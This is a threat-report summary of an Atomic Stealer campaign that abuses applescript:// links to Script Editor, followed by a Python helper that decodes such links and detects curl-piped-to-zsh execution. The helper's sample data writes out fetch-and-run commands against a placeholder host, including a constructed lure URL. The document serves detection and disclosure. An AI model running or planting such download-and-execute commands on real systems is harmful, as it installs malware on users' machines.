Researchers observed a new campaign delivering the Atomic Stealer to macOS users by abusing the built-in Script Editor via applescript:// links that open pre-filled malicious code. The obfuscated ‘curl | zsh’ payload decodes and runs a Mach-O Atomic Stealer binary that harvests Keychain items, browser wallet extensions, passwords, cookies, and system data, so users should avoid running Script Editor prompts and follow official Apple guidance. #AtomicStealer #ScriptEditor
Key points
- Attackers use fake Apple-themed sites with applescript:// links to launch Script Editor with malicious, pre-filled scripts.
- The malicious script executes an obfuscated ‘curl | zsh’ command that downloads and runs a payload in memory.
- The final payload is a Mach-O binary (Atomic Stealer/AMOS) that exfiltrates Keychain data, browser wallets, autofill data, passwords, cookies, and system information.
- This variation of the ClickFix technique removes the need for users to manually run Terminal commands, sidestepping some user interaction protections.
- Mac users should treat Script Editor prompts as high-risk and rely on official Apple documentation for troubleshooting.
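As an added example (not code from the original report or the researchers behind it), a small Python triage helper for the two points above: recovering the script an applescript:// link would pre-fill in Script Editor so it can be read without opening it, and flagging process telemetry where Script Editor spawned a shell that pipes curl into zsh. The applescript:// query layout, the telemetry field names and all sample data are assumptions constructed for this example.

```python
# Triage helpers for the applescript:// Script Editor ClickFix variant. Added example;
# the URL query layout (com.apple.scripteditor?action=new&script=...) and the
# telemetry fields parent/image/cmdline are assumptions, and all sample data is constructed.
import re
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Processes that run an AppleScript 'do shell script' on the user's behalf.
SCRIPT_EDITOR_PARENTS = ("Script Editor", "osascript")
# curl/wget output piped straight into a shell interpreter (plain, unobfuscated form only).
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(zsh|bash|sh)\b")

# Constructed link in the shape a lure page could embed; example.invalid is a placeholder host.
SAMPLE_URL = ("applescript://com.apple.scripteditor?action=new&script="
              "do%20shell%20script%20%22curl%20-fsSL%20https%3A%2F%2Fexample.invalid%2Fx%20%7C%20zsh%22")

def parse_applescript_url(url: str) -> Optional[str]:
    """Return the script an applescript:// link would pre-fill, without opening Script Editor."""
    parts = urlsplit(url)
    if parts.scheme != "applescript":
        return None
    scripts = parse_qs(parts.query).get("script")  # parse_qs percent-decodes the value
    return scripts[0] if scripts else None

def link_is_suspicious(url: str) -> bool:
    """True when the pre-filled script fetches a remote resource and pipes it into a shell."""
    script = parse_applescript_url(url)
    return bool(script and PIPE_TO_SHELL.search(script))

def flag_script_editor_shell(event: dict) -> bool:
    """True when Script Editor/osascript spawned a shell whose command pipes curl/wget into a shell."""
    if not any(p in event.get("parent", "") for p in SCRIPT_EDITOR_PARENTS):
        return False
    return PIPE_TO_SHELL.search(event.get("cmdline", "")) is not None

# Constructed process-start telemetry: only the first record is the chain described above.
SAMPLE_EVENTS = [
    {"parent": "/System/Applications/Utilities/Script Editor.app/Contents/MacOS/Script Editor",
     "image": "/bin/sh", "cmdline": 'sh -c "curl -fsSL https://example.invalid/x | zsh"'},
    {"parent": "/System/Applications/Utilities/Script Editor.app/Contents/MacOS/Script Editor",
     "image": "/bin/sh", "cmdline": 'sh -c "defaults read com.apple.finder"'},  # benign automation
    {"parent": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal",
     "image": "/bin/zsh", "cmdline": "zsh -c 'curl -fsSL https://example.invalid/x | zsh'"},  # Terminal-based ClickFix, outside this rule
]

def triage(events) -> list:
    """Indices of events matching the Script Editor -> shell -> curl | zsh chain."""
    return [i for i, e in enumerate(events) if flag_script_editor_shell(e)]
```

The regex catches only the plain form; for an obfuscated one-liner, decode the link with parse_applescript_url first and review the script text.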